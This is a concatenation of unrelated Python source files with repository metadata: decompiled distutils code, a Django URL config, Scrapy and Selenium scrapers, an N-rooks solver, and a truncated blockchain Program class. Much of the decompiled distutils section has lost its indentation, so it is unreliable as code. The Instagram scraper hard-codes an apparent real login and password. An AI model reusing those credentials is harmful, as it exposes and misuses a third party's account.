"""A command's raison d'etre: carry out the action it exists to
perform, controlled by the options initialized in
'initialize_options()', customized by other commands, the setup
script, the command-line, and config files, and finalized in
'finalize_options()'. All terminal output and filesystem
interaction should be done by 'run()'.
This method must be implemented by all command classes.
"""
raise RuntimeError, 'abstract method -- subclass %s must override' % self.__class__
def announce(self, msg, level = 1):
"""If the current verbosity level is of greater than or equal to
'level' print 'msg' to stdout.
"""
log.log(level, msg)
def debug_print(self, msg):
"""Print 'msg' to stdout if the global DEBUG (taken from the
DISTUTILS_DEBUG environment variable) flag is true.
"""
from distutils.debug import DEBUG
if DEBUG:
print msg
sys.stdout.flush()
    def _ensure_stringlike(self, option, what, default = None):
        # Helper shared by the ensure_* methods: if the option attribute is
        # unset, install 'default'; otherwise insist the value is a string
        # ('what' names the expected kind in the error message).
        val = getattr(self, option)
        if val is None:
            setattr(self, option, default)
            return default
        else:
            if not isinstance(val, str):
                raise DistutilsOptionError, "'%s' must be a %s (got `%s`)" % (option, what, val)
            return val
def ensure_string(self, option, default = None):
"""Ensure that 'option' is a string; if not defined, set it to
'default'.
"""
self._ensure_stringlike(option, 'string', default)
def ensure_string_list(self, option):
r"""Ensure that 'option' is a list of strings. If 'option' is
currently a string, we split it either on /,\s*/ or /\s+/, so
"foo bar baz", "foo,bar,baz", and "foo, bar baz" all become
["foo", "bar", "baz"].
"""
val = getattr(self, option)
if val is None:
return
else:
if isinstance(val, str):
setattr(self, option, re.split(',\\s*|\\s+', val))
else:
if isinstance(val, list):
ok = 1
for element in val:
if not isinstance(element, str):
ok = 0
break
else:
ok = 0
if not ok:
raise DistutilsOptionError, "'%s' must be a list of strings (got %r)" % (option, val)
return
    def _ensure_tested_string(self, option, tester, what, error_fmt, default = None):
        # Like _ensure_stringlike, but additionally validate the value with
        # 'tester'; 'error_fmt' must contain one '%s' for the bad value.
        val = self._ensure_stringlike(option, what, default)
        if val is not None and not tester(val):
            raise DistutilsOptionError, ("error in '%s' option: " + error_fmt) % (option, val)
        return
def ensure_filename(self, option):
"""Ensure that 'option' is the name of an existing file."""
self._ensure_tested_string(option, os.path.isfile, 'filename', "'%s' does not exist or is not a file")
    def ensure_dirname(self, option):
        """Ensure that 'option' is the name of an existing directory."""
        self._ensure_tested_string(option, os.path.isdir, 'directory name', "'%s' does not exist or is not a directory")
    def get_command_name(self):
        # Prefer an explicit 'command_name' attribute; otherwise fall back
        # to the class name.
        if hasattr(self, 'command_name'):
            return self.command_name
        else:
            return self.__class__.__name__
def set_undefined_options(self, src_cmd, *option_pairs):
"""Set the values of any "undefined" options from corresponding
option values in some other command object. "Undefined" here means
"is None", which is the convention used to indicate that an option
has not been changed between 'initialize_options()' and
'finalize_options()'. Usually called from 'finalize_options()' for
options that depend on some other command rather than another
option of the same command. 'src_cmd' is the other command from
which option values will be taken (a command object will be created
for it if necessary); the remaining arguments are
'(src_option,dst_option)' tuples which mean "take the value of
'src_option' in the 'src_cmd' command object, and copy it to
'dst_option' in the current command object".
"""
src_cmd_obj = self.distribution.get_command_obj(src_cmd)
src_cmd_obj.ensure_finalized()
for src_option, dst_option in option_pairs:
if getattr(self, dst_option) is None:
setattr(self, dst_option, getattr(src_cmd_obj, src_option))
return
def get_finalized_command(self, command, create = 1):
"""Wrapper around Distribution's 'get_command_obj()' method: find
(create if necessary and 'create' is true) the command object for
'command', call its 'ensure_finalized()' method, and return the
finalized command object.
"""
cmd_obj = self.distribution.get_command_obj(command, create)
cmd_obj.ensure_finalized()
return cmd_obj
    def reinitialize_command(self, command, reinit_subcommands = 0):
        # Delegate to the Distribution's reinitialize_command (see
        # distutils.dist for the exact reset semantics).
        return self.distribution.reinitialize_command(command, reinit_subcommands)
def run_command(self, command):
"""Run some other command: uses the 'run_command()' method of
Distribution, which creates and finalizes the command object if
necessary and then invokes its 'run()' method.
"""
self.distribution.run_command(command)
def get_sub_commands(self):
"""Determine the sub-commands that are relevant in the current
distribution (ie., that need to be run). This is based on the
'sub_commands' class attribute: each tuple in that list may include
a method that we call to determine if the subcommand needs to be
run for the current distribution. Return a list of command names.
"""
commands = []
for cmd_name, method in self.sub_commands:
if method is None or method(self):
commands.append(cmd_name)
return commands
    def warn(self, msg):
        """Log a warning message prefixed with this command's name."""
        log.warn('warning: %s: %s\n' % (self.get_command_name(), msg))
    def execute(self, func, args, msg = None, level = 1):
        """Run 'func(*args)' via distutils.util.execute, honouring dry-run."""
        util.execute(func, args, msg, dry_run=self.dry_run)
    def mkpath(self, name, mode = 511):
        # 511 == 0777 octal; create the directory and any missing parents,
        # honouring the dry-run flag.
        dir_util.mkpath(name, mode, dry_run=self.dry_run)
def copy_file(self, infile, outfile, preserve_mode = 1, preserve_times = 1, link = None, level = 1):
"""Copy a file respecting verbose, dry-run and force flags. (The
former two default to whatever is in the Distribution object, and
the latter defaults to false for commands that don't define it.)"""
return file_util.copy_file(infile, outfile, preserve_mode, preserve_times, not self.force, link, dry_run=self.dry_run)
def copy_tree(self, infile, outfile, preserve_mode = 1, preserve_times = 1, preserve_symlinks = 0, level = 1):
"""Copy an entire directory tree respecting verbose, dry-run,
and force flags.
"""
return dir_util.copy_tree(infile, outfile, preserve_mode, preserve_times, preserve_symlinks, not self.force, dry_run=self.dry_run)
def move_file(self, src, dst, level = 1):
"""Move a file respecting dry-run flag."""
return file_util.move_file(src, dst, dry_run=self.dry_run)
def spawn(self, cmd, search_path = 1, level = 1):
"""Spawn an external command respecting dry-run flag."""
from distutils.spawn import spawn
spawn(cmd, search_path, dry_run=self.dry_run)
    def make_archive(self, base_name, format, root_dir = None, base_dir = None, owner = None, group = None):
        """Create an archive via distutils.archive_util, honouring dry-run."""
        return archive_util.make_archive(base_name, format, root_dir, base_dir, dry_run=self.dry_run, owner=owner, group=group)
def make_file(self, infiles, outfile, func, args, exec_msg = None, skip_msg = None, level = 1):
"""Special case of 'execute()' for operations that process one or
more input files and generate one output file. Works just like
'execute()', except the operation is skipped and a different
message printed if 'outfile' already exists and is newer than all
files listed in 'infiles'. If the command defined 'self.force',
and it is true, then the command is unconditionally run -- does no
timestamp checks.
"""
if skip_msg is None:
skip_msg = 'skipping %s (inputs unchanged)' % outfile
if isinstance(infiles, str):
infiles = (infiles,)
elif not isinstance(infiles, (list, tuple)):
raise TypeError, "'infiles' must be a string, or a list or tuple of strings"
if exec_msg is None:
exec_msg = 'generating %s from %s' % (outfile, ', '.join(infiles))
if self.force or dep_util.newer_group(infiles, outfile):
self.execute(func, args, exec_msg, level)
else:
log.debug(skip_msg)
return
class install_misc(Command):
    """Common base class for installing some files in a subdirectory.
    Currently used by install_data and install_scripts.
    """
    user_options = [('install-dir=', 'd', 'directory to install the files to')]
    def initialize_options(self):
        # 'install_dir' is normally filled in from the 'install' command via
        # _install_dir_from(); 'outfiles' records the paths actually copied.
        self.install_dir = None
        self.outfiles = []
        return
    def _install_dir_from(self, dirname):
        # Copy the named attribute of the 'install' command into install_dir.
        self.set_undefined_options('install', (dirname, 'install_dir'))
    def _copy_files(self, filelist):
        # Copy every file in 'filelist' into install_dir, recording the
        # destination paths in self.outfiles.
        self.outfiles = []
        if not filelist:
            return
        self.mkpath(self.install_dir)
        for f in filelist:
            self.copy_file(f, self.install_dir)
            self.outfiles.append(os.path.join(self.install_dir, f))
    def get_outputs(self):
        """Return the list of files installed by the last _copy_files call."""
        return self.outfiles
# okay decompyling c:\Users\PC\wotsources\files\originals\res_bw\scripts\common\lib\distutils\cmd.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.10.11 22:19:24 Střední Evropa (letní čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|
35b080e015f21cdb9155cddd726966872085a254
|
81b7d4f68586e9831ec4f1d1825b13ab9bcdad71
|
/p8.py
|
56e3eab8a4c450fb8965cd0d4ebec34846ddea8d
|
[] |
no_license
|
jeanpaulpitman/sandbox
|
99a23b091ab6e56e557f6bebdf754145d65f5d26
|
5a8e88c522c43eff583929ffce80ad3e559eff46
|
refs/heads/master
| 2021-01-16T21:33:32.378547
| 2017-11-01T04:24:58
| 2017-11-01T04:24:58
| 100,237,373
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 95
|
py
|
# Double every character of the message, e.g. "ab" -> "aabb".
s = "Welcome to the Jungle"
new_s = "".join(ch + ch for ch in s)
print(new_s)
|
[
"jeanpaul.pitman@my.jcu.edu.au"
] |
jeanpaul.pitman@my.jcu.edu.au
|
c3b7367762bfbce704395f5ea3cf7a4ec1c20c53
|
93b9097c9e0f3d156878d41d1e3110a0c1fb4fe5
|
/smarthome/urls.py
|
cd58e1e4a5d6d828f703a3944e6430ede7c8fe27
|
[] |
no_license
|
japaqonik/py_smarthome
|
acf4f0fd139545ef64e512888723809d4df684ef
|
9b2f8a66982c309be7de34e699106b983d9afa73
|
refs/heads/master
| 2022-12-25T00:39:21.045400
| 2020-09-28T09:17:33
| 2020-09-28T09:17:33
| 299,213,459
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 943
|
py
|
"""smarthome URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from pages.views import home_view, login_view, logout_view
# URL routes are tried top-to-bottom; the catch-all '' pattern for the home
# page therefore comes after the more specific login/logout paths.
urlpatterns = [
    path('logout/', logout_view, name='logout'),
    path('login/', login_view, name='login'),
    path('', home_view, name='home'),
    path('admin/', admin.site.urls),
]
|
[
"japaqonik@gmail.com"
] |
japaqonik@gmail.com
|
69b260836cb53c44836fb3a6e5c2660b38909c73
|
efa7b95174e8d50e2031598fccb944e0a066216e
|
/JobWeb/spiders/NeiTui.py
|
acf4aa989858c3a201e1abc16052fde66cd61715
|
[] |
no_license
|
wucunfeng/rainbowHorse
|
864eee6062da64fd6fef945ebdccd5a6bd951ec0
|
b4b3b2821de235a425526c1f8515f80c29d3c518
|
refs/heads/master
| 2020-05-09T09:48:33.747855
| 2019-06-07T10:59:22
| 2019-06-07T10:59:22
| 181,017,301
| 2
| 0
| null | 2019-04-12T13:49:26
| 2019-04-12T13:49:26
| null |
UTF-8
|
Python
| false
| false
| 981
|
py
|
#utf-8
from scrapy import Request
from scrapy.spider import Spider
from JobWeb.items import NeiTui
from JobWeb.Requesthead import NeiTuiHeaders
class NeiTuiSpider(Spider):
    """Scrapy spider for job listings on neitui.me.

    Yields one NeiTui item (title + company) per listing and follows the
    "Next" pagination link until none remains.
    """
    name = 'NeiTui'
    def start_requests(self):
        # Entry point: request the job-listing index with custom headers.
        url = 'http://www.neitui.me/?name=job&handle=lists'
        yield Request(url = url, headers = NeiTuiHeaders)
    def parse(self, response):
        # NOTE(review): a single item instance is reused across loop
        # iterations; this is safe only if downstream consumers read the
        # fields before the next iteration overwrites them — confirm.
        item = NeiTui()
        NEITUI = response.xpath('.//div[@class = "media"]')
        for neitui in NEITUI:
            item['NeiTuiTitle'] = neitui.xpath('.//div[@class = "mt5 clearfix"]/a/text()').extract()[0]
            item['NeiTuiCompany'] = neitui.xpath('.//div[@class = "grey mt5"]/span/a/text()').extract()[0]
            yield item
        # Follow pagination: the "Next" link href is site-relative.
        next_Link = response.xpath('.//div[@class = "text-center"]/nav/ul/li/a[@aria-label = "Next"]/@href').extract()
        if next_Link:
            next_Link = 'http://www.neitui.me/'+next_Link[0]
            yield Request(next_Link,headers=NeiTuiHeaders)
|
[
"wu1998102@gmail.com"
] |
wu1998102@gmail.com
|
9a00be30afc2143a70c3c5158321bf0b654b9a46
|
d4cd3d06039b1a1f2d8dd624414263bfe031fceb
|
/docs/soft/maixpy3/replace_metadata.py
|
316c4ed0ee4c4de7beb238af83390666c9d6844a
|
[
"MIT"
] |
permissive
|
NTestZ/sipeed_wiki
|
7c1e2029ded979829e0e748ccb0b876ef3e374af
|
1f5fd7dcadbcec952a260213911419028eb59006
|
refs/heads/main
| 2023-07-07T12:43:31.854451
| 2021-08-07T09:29:16
| 2021-08-07T09:29:16
| 393,743,071
| 0
| 0
|
MIT
| 2021-08-07T17:03:09
| 2021-08-07T17:03:08
| null |
UTF-8
|
Python
| false
| false
| 1,209
|
py
|
import os, sys
from glob import glob
import re
# Prepend a YAML front-matter header (title / keywords / desc) to every
# Markdown file under the directory given as the first CLI argument.
path = sys.argv[1]
file_dirs = glob(os.path.join(path, "**"), recursive=True)
for path in file_dirs:
    if os.path.isdir(path):
        continue
    if not path.endswith(".md"):
        continue
    print("deal:", path)
    with open(path, encoding="utf-8") as f:
        content = f.read()
    title = ""
    # re.sub callbacks: each strips the matched heading from the document
    # and stashes the extracted title in the module-level 'title'.
    def re_replace_sharp_h1(c):
        global title
        # Drop the leading '# ' and the trailing newline.
        title = c[0][2:-1]
        return ""
    def re_replace_h1(c):
        global title
        title = c[0].split("\n")[0]
        return ""
    # find title from the setext form:
    #   title
    #   ===
    content = re.sub(r'.*\n===.*\n', re_replace_h1, content, flags=re.MULTILINE)
    if not title:
        # find title from the ATX form:
        #   # title
        content = re.sub(r'^# .*\n', re_replace_sharp_h1, content)
    header = '''---
title: {}
keywords: maixpy, k210, AIOT, 边缘计算
desc: maixpy doc: {}
---
'''.format(title, title)
    content = header + content
    with open(path, "w", encoding="utf-8") as f:
        f.write(content)
|
[
"a495094740@gmail.com"
] |
a495094740@gmail.com
|
2f389251120f5b55b7e13abdeec5e4a4cf1d2fca
|
70e32629fef6a060448d2fb19b2c24abd84647b0
|
/app1.py
|
4385646e5111363599313e429c19e9e206b16ea9
|
[] |
no_license
|
9500guswn/1.--
|
a9be6fda38c8f12d52bdcbecc56d59919c9691a6
|
8bb73c687d0ef6c2cd3f493ddf3f513c5cdd0514
|
refs/heads/master
| 2022-12-12T10:26:13.825647
| 2020-09-01T02:33:17
| 2020-09-01T02:33:17
| 289,879,192
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,559
|
py
|
from selenium import webdriver
import time
import warnings
from bs4 import BeautifulSoup
from pymongo import MongoClient # pymongo를 임포트 하기(패키지 인스톨 먼저 해야겠죠?)
client = MongoClient('localhost', 27017) # mongoDB는 27017 포트로 돌아갑니다.
db = client.project
import lxml
# from lxml import etree
import re
driver = webdriver.Chrome('chromedriver.exe')
# Wait up to 3 seconds for elements to appear (implicit wait).
driver.implicitly_wait(3)
# Suppress warning messages globally.
warnings.filterwarnings(action='ignore')
def get_content(driver):
    """Scrape hashtag text from the currently loaded Instagram page.

    Prints each element with class 'xil3i' minus its leading character
    (the '#'), then dumps the raw page source. Most of the original
    review-parsing logic is left commented out below.
    """
    html=driver.page_source
    soup = BeautifulSoup(html, 'html.parser')
    # soup=BeautifulSoup(html,lxml)
    # print(soup)
    # reviews=soup.select('div.EZdmt > div > div > div')
    # # body > div._2dDPU.CkGkG > div.zZYga > div > article > div.eo2As > div.EtaWk > ul > div > li > div > div > div.C4VMK > span
    # # tag_list=[]
    # for tags in reviews:
    #     hashtag=tags.select_one('a > div > div > img')['src']
    #     # body > div._2dDPU.CkGkG > div.zZYga > div > article > div.eo2As > div.EtaWk > ul > div > li > div > div > div.C4VMK > span > a: nth - child(
    #     # # 10)
    #     print(hashtag)
    for i in soup.find_all("a", class_="xil3i") :
        # i.text[1:] strips the leading '#' from the hashtag text.
        print(i.text[1:])
    pageString = driver.page_source
    print(pageString)
    # try:
    #
    #     content=soup.select('div.C4VMK > span')[0].text
    # except:
    #     content = ' '
    # tags = re.findall(r'#[^\s#,\\]+', content)  #
# Log in to Instagram, dismiss dialogs, open a hashtag page and click the
# first post tile.
driver.get('https://www.instagram.com/accounts/login/')
time.sleep(3)
# driver.find_element_by_xpath('//*[@id="loginForm"]/div/div[1]/div/label/input').send_keys("01050083203")
# driver.find_element_by_xpath('//*[@id="loginForm"]/div/div[2]/div/label/input').send_keys("eogkrtod12")
# SECURITY NOTE(review): account credentials are hard-coded in plain text;
# move them to environment variables or a secrets store.
driver.find_element_by_name('username').send_keys('01050083203')
driver.find_element_by_name('password').send_keys('eogkrtod12')
time.sleep(3)
# Click the login button.
driver.find_element_by_xpath('//*[@id="loginForm"]/div/div[3]/button').click()
# Click through a post-login dialog button.
driver.find_element_by_xpath('//*[@id="react-root"]/section/main/div/div/div/section/div/button').click()
# Click another dialog button (presumably the notifications prompt — confirm).
driver.find_element_by_xpath('/html/body/div[4]/div/div/div/div[3]/button[2]').click()
time.sleep(3)
driver.get('https://www.instagram.com/explore/tags/수원돈까스맛집')
time.sleep(3)
# find_element_by_css_selector returns the first element matching the selector.
first=driver.find_element_by_css_selector ( "div._9AhH0")
first.click()
time.sleep(3)
result=[]
target=10
|
[
"9500guswn@gmail.com"
] |
9500guswn@gmail.com
|
10f222d7fb4fa9cb062fe04ba157b94d6fd37828
|
752adab52f583fb148ad813c89ac325e5a1f604e
|
/Elements Of AI/RooksAndQueens/nrooks-2.py
|
a95986f445af031ebfb008c74227d2ada94132b6
|
[] |
no_license
|
nawazkh/MSCS-IUB
|
45283db78f1a91985a30c50c42211772f7934c5e
|
43f1799f18432af4f6d33efed6cf653af840033b
|
refs/heads/master
| 2021-10-20T16:08:35.705016
| 2019-02-28T18:42:59
| 2019-02-28T18:42:59
| 103,451,289
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,421
|
py
|
#!/usr/bin/env python
# nrooks.py : Solve the N-Rooks problem!
# D. Crandall, 2016
# Updated by Zehua Zhang, 2017
#
# The N-rooks problem is: Given an empty NxN chessboard, place N rooks on the board so that no rooks
# can take any other, i.e. such that no two rooks share the same row or column.
import sys
import time
# Count # of pieces in given row
def count_on_row(board, row):
    """Return the number of pieces on the given row of the board."""
    return sum(board[row])
# Count # of pieces in given column
def count_on_col(board, col):
    """Return the number of pieces in the given column of the board."""
    return sum(board_row[col] for board_row in board)
# Count total # of pieces on board
def count_pieces(board):
    """Return the total number of pieces anywhere on the board."""
    total = 0
    for board_row in board:
        total += sum(board_row)
    return total
# Return a string with the board rendered in a human-friendly format
def printable_board(board):
    """Render the board as text: 'R' marks a piece, '_' an empty square."""
    rendered_rows = []
    for board_row in board:
        rendered_rows.append(" ".join("R" if cell else "_" for cell in board_row))
    return "\n".join(rendered_rows)
def modified_printable_board2(board):
    """Render the board like printable_board, but mark the globally
    excluded square (rowExclude, colExclude) with 'X'.

    Reads the module-level globals rowExclude and colExclude.
    """
    printRow = ""
    r = 0
    c = 0
    for row in board:
        c = 0
        for col in row:
            if(r == rowExclude):
                if(c == colExclude):
                    printRow += "X "
                else:
                    if(col == 0):
                        printRow += "_ "
                    else:
                        printRow += "R "
            else:
                if(col == 0):
                    printRow += "_ "
                else:
                    printRow += "R "
            c += 1
        r += 1
        printRow += "\n"
    return printRow
# Add a piece to the board at the given position, and return a new board (doesn't change original)
def add_piece(board, row, col):
    """Return a new board with a piece added at (row, col).

    The input board is not modified: the affected row is rebuilt with a 1
    at the requested column and spliced between the untouched rows. This
    non-mutating behavior matters because the initial board may share row
    objects (it is built with [[0]*N]*N).
    """
    new_row = board[row][:col] + [1] + board[row][col + 1:]
    return board[:row] + [new_row] + board[row + 1:]
# Get list of successors of given board state
def successors2(board):
    """Generate successor boards by adding one piece to 'board'.

    Pruned successor function: only expands squares whose row and column
    are currently empty, never exceeds N pieces total, and skips the
    globally excluded square (rowExclude, colExclude) when one is given
    (negative values disable the exclusion). Reads module-level globals
    N, rowExclude and colExclude.
    """
    tempList=[]
    itemsOnBoard = count_pieces(board)
    itemsOnRow = 0
    for r in range(0,N):
        itemsOnRow = count_on_row(board,r)
        for c in range(0,N):
            if(board[r][c] == 1):#implies if 1 is at [1,1] do not re add onto it
                pass
            else: #add it to the fringe
                if(itemsOnBoard <= N-1 ):# to remove adding of more than N items
                    #print "in new else" , count_pieces(board)#if the item is present a row, exclude that row
                    if( itemsOnRow == 0):#if the item not present in that row, then add item
                        if(count_on_col(board,c) == 0):#if item not present in that column, then add item
                            #print "count_on_row(board,r)",count_on_row(board,r),"count_on_col(board,c)",count_on_col(board,c)
                            if(rowExclude < 0 or colExclude < 0):
                                tempList.append(add_piece(board, r, c))
                            else:
                                if(r == rowExclude and c == colExclude):
                                    pass
                                else:
                                    tempList.append(add_piece(board, r, c))
                            #tempList.append(add_piece(board, r, c))
                        else:# ignore expansion if the column already has an item
                            pass
                    else:#if an item already there at row r, ignore expansion
                        pass
                else:
                    print "excluding expanding of state space if the number of items are more than N"
                    pass
    return tempList
def successors(board):
    # Naive successor function: add a piece at every square. Unused by the
    # current solve(), which calls the pruned successors2() instead.
    # print "successors()"
    return [ add_piece(board, r, c) for r in range(0, N) for c in range(0,N) ]
# check if board is a goal state
def is_goal(board):
    # Goal test: exactly N pieces, with no two sharing a row or a column.
    # print "is_goal"
    return count_pieces(board) == N and \
        all( [ count_on_row(board, r) <= 1 for r in range(0, N) ] ) and \
        all( [ count_on_col(board, c) <= 1 for c in range(0, N) ] )
# Solve n-rooks!
def solve(initial_board):
    """Depth-first search (LIFO fringe) for an N-rooks goal board.

    Returns a solved board, or False if the search space is exhausted.
    """
    # print "solve"
    fringe = [initial_board]
    # print fringe
    while len(fringe) > 0:
        #print "hi"
        #print fringe
        for s in successors2( fringe.pop() ):
            #print "fringe popped"
            #print s
            #print "---"
            if is_goal(s):
                return(s)
            fringe.append(s)
    # print fringe
    return False
# This is N, the size of the board. It is passed through command line arguments.
# Command-line arguments: board size N, then the 1-based (row, col) of the
# square that must stay empty; passing 0 0 yields -1/-1, which disables
# the exclusion (see successors2).
N = int(sys.argv[1])
rowExclude = int(sys.argv[2]) - 1
colExclude = int(sys.argv[3]) - 1
#print "Initial params set"
# The board is stored as a list-of-lists. Each inner list is a row of the board.
# A zero in a given square indicates no piece, and a 1 indicates a piece.
# NOTE(review): [[0]*N]*N shares a single row object across all N rows;
# this is safe here only because add_piece() never mutates rows in place.
initial_board = [[0]*N]*N
#print ("Starting from initial board:\n" + modified_printable_board2(initial_board) + "\n\nLooking for solution...\n")
tempTime = int(time.time()*1000000)
solution = solve(initial_board)
print (modified_printable_board2(solution) if solution else "Sorry, no solution found. :(")
tempTime2 = int(time.time()*1000000)
print "Time Elapsed in milliseconds for",N," rooks using stack",tempTime2 - tempTime
|
[
"nawazkh@Nawazs-MacBook-Pro.local"
] |
nawazkh@Nawazs-MacBook-Pro.local
|
8679df74503c5e8225b1f6736be8fc111122959d
|
2c95e0f7bb3f977306f479d5c99601ab1d5c61f2
|
/olive/types/blockchain_format/program.py
|
991578faa53a9376f9b547c5acec541b38be843a
|
[
"Apache-2.0"
] |
permissive
|
Olive-blockchain/Olive-blockchain-CLI
|
d62444f8456467f8105531178d2ae53d6e92087d
|
8c4a9a382d68fc1d71c5b6c1da858922a8bb8808
|
refs/heads/main
| 2023-07-19T03:51:08.700834
| 2021-09-19T16:05:10
| 2021-09-19T16:05:10
| 406,045,499
| 0
| 0
|
Apache-2.0
| 2021-09-19T16:05:10
| 2021-09-13T16:20:38
|
Python
|
UTF-8
|
Python
| false
| false
| 7,275
|
py
|
import io
from typing import List, Set, Tuple
from clvm import KEYWORD_FROM_ATOM, KEYWORD_TO_ATOM, SExp
from clvm import run_program as default_run_program
from clvm.casts import int_from_bytes
from clvm.EvalError import EvalError
from clvm.operators import OP_REWRITE, OPERATOR_LOOKUP
from clvm.serialize import sexp_from_stream, sexp_to_stream
from clvm_rs import STRICT_MODE, deserialize_and_run_program2, serialized_length
from clvm_tools.curry import curry, uncurry
from olive.types.blockchain_format.sized_bytes import bytes32
from olive.util.hash import std_hash
from .tree_hash import sha256_treehash
def run_program(
    program,
    args,
    max_cost,
    operator_lookup=OPERATOR_LOOKUP,
    pre_eval_f=None,
):
    """Thin wrapper over clvm's run_program with reordered parameters
    (max_cost moved ahead of operator_lookup for local convenience)."""
    return default_run_program(
        program,
        args,
        operator_lookup,
        max_cost,
        pre_eval_f=pre_eval_f,
    )
INFINITE_COST = 0x7FFFFFFFFFFFFFFF
class Program(SExp):
    """
    A thin wrapper around s-expression data intended to be invoked with "eval".
    """
    @classmethod
    def parse(cls, f) -> "Program":
        # Deserialize a single s-expression from stream 'f'.
        return sexp_from_stream(f, cls.to)
    def stream(self, f):
        # Serialize this program onto stream 'f'.
        sexp_to_stream(self, f)
    @classmethod
    def from_bytes(cls, blob: bytes) -> "Program":
        f = io.BytesIO(blob)
        result = cls.parse(f)  # type: ignore # noqa
        # The blob must contain exactly one serialized program, nothing more.
        assert f.read() == b""
        return result
    def to_serialized_program(self) -> "SerializedProgram":
        return SerializedProgram.from_bytes(bytes(self))
    def __bytes__(self) -> bytes:
        f = io.BytesIO()
        self.stream(f)  # type: ignore # noqa
        return f.getvalue()
    def __str__(self) -> str:
        # Hex encoding of the serialized form.
        return bytes(self).hex()
    def get_tree_hash(self, *args: List[bytes32]) -> bytes32:
        """
        Any values in `args` that appear in the tree
        are presumed to have been hashed already.
        """
        return sha256_treehash(self, set(args))
    def run_with_cost(self, max_cost: int, args) -> Tuple[int, "Program"]:
        prog_args = Program.to(args)
        cost, r = run_program(self, prog_args, max_cost)
        return cost, Program.to(r)
    def run(self, args) -> "Program":
        # Run with an effectively unlimited cost budget; the cost is discarded.
        cost, r = self.run_with_cost(INFINITE_COST, args)
        return r
    def curry(self, *args) -> "Program":
        cost, r = curry(self, list(args))
        return Program.to(r)
    def uncurry(self) -> Tuple["Program", "Program"]:
        r = uncurry(self)
        if r is None:
            # Not a curried program: return it unchanged with nil arguments.
            return self, self.to(0)
        return r
    def as_int(self) -> int:
        return int_from_bytes(self.as_atom())
    def as_atom_list(self) -> List[bytes]:
        """
        Pretend `self` is a list of atoms. Return the corresponding
        python list of atoms.
        At each step, we always assume a node to be an atom or a pair.
        If the assumption is wrong, we exit early. This way we never fail
        and always return SOMETHING.
        """
        items = []
        obj = self
        while True:
            pair = obj.pair
            if pair is None:
                break
            atom = pair[0].atom
            if atom is None:
                break
            items.append(atom)
            obj = pair[1]
        return items
    def __deepcopy__(self, memo):
        # Deep copy via a serialize/deserialize round trip.
        return type(self).from_bytes(bytes(self))
    EvalError = EvalError
def _tree_hash(node: SExp, precalculated: Set[bytes32]) -> bytes32:
    """
    Hash values in `precalculated` are presumed to have been hashed already.
    """
    if node.listp():
        # Pair node: hash(0x02 || hash(left) || hash(right)).
        left = _tree_hash(node.first(), precalculated)
        right = _tree_hash(node.rest(), precalculated)
        s = b"\2" + left + right
    else:
        atom = node.as_atom()
        if atom in precalculated:
            # Atom is already a hash; pass it through unchanged.
            return bytes32(atom)
        # Atom node: hash(0x01 || atom).
        s = b"\1" + atom
    return bytes32(std_hash(s))
def _serialize(node) -> bytes:
    # SerializedProgram already holds serialized bytes; anything else is
    # converted to an SExp and serialized.
    if type(node) == SerializedProgram:
        return bytes(node)
    else:
        return SExp.to(node).as_bin()
class SerializedProgram:
    """
    An opaque representation of a clvm program. It has a more limited interface than a full SExp
    """
    _buf: bytes = b""
    @classmethod
    def parse(cls, f) -> "SerializedProgram":
        # Compute the serialized length from the remaining buffer, then
        # consume exactly that many bytes from the stream.
        length = serialized_length(f.getvalue()[f.tell() :])
        return SerializedProgram.from_bytes(f.read(length))
    def stream(self, f):
        f.write(self._buf)
    @classmethod
    def from_bytes(cls, blob: bytes) -> "SerializedProgram":
        ret = SerializedProgram()
        ret._buf = bytes(blob)
        return ret
    @classmethod
    def from_program(cls, p: Program) -> "SerializedProgram":
        ret = SerializedProgram()
        ret._buf = bytes(p)
        return ret
    def to_program(self) -> Program:
        return Program.from_bytes(self._buf)
    def uncurry(self) -> Tuple["Program", "Program"]:
        # Deserializes first; see Program.uncurry for the semantics.
        return self.to_program().uncurry()
    def __bytes__(self) -> bytes:
        return self._buf
    def __str__(self) -> str:
        return bytes(self).hex()
    def __repr__(self):
        return "%s(%s)" % (self.__class__.__name__, str(self))
    def __eq__(self, other) -> bool:
        # Equality is byte-for-byte on the serialized form.
        if not isinstance(other, SerializedProgram):
            return False
        return self._buf == other._buf
    def __ne__(self, other) -> bool:
        if not isinstance(other, SerializedProgram):
            return True
        return self._buf != other._buf
    def get_tree_hash(self, *args: List[bytes32]) -> bytes32:
        """
        Any values in `args` that appear in the tree
        are presumed to have been hashed already.
        """
        tmp = sexp_from_stream(io.BytesIO(self._buf), SExp.to)
        return _tree_hash(tmp, set(args))
    def run_safe_with_cost(self, max_cost: int, *args) -> Tuple[int, Program]:
        # STRICT_MODE makes the rust runtime reject unknown opcodes.
        return self._run(max_cost, STRICT_MODE, *args)
    def run_with_cost(self, max_cost: int, *args) -> Tuple[int, Program]:
        return self._run(max_cost, 0, *args)
    def _run(self, max_cost: int, flags, *args) -> Tuple[int, Program]:
        # when multiple arguments are passed, concatenate them into a serialized
        # buffer. Some arguments may already be in serialized form (e.g.
        # SerializedProgram) so we don't want to de-serialize those just to
        # serialize them back again. This is handled by _serialize()
        serialized_args = b""
        if len(args) > 1:
            # when we have more than one argument, serialize them into a list
            # (0xff is the clvm pair marker, 0x80 the nil terminator)
            for a in args:
                serialized_args += b"\xff"
                serialized_args += _serialize(a)
            serialized_args += b"\x80"
        else:
            serialized_args += _serialize(args[0])
        # TODO: move this ugly magic into `clvm` "dialects"
        native_opcode_names_by_opcode = dict(
            ("op_%s" % OP_REWRITE.get(k, k), op) for op, k in KEYWORD_FROM_ATOM.items() if k not in "qa."
        )
        cost, ret = deserialize_and_run_program2(
            self._buf,
            serialized_args,
            KEYWORD_TO_ATOM["q"][0],
            KEYWORD_TO_ATOM["a"][0],
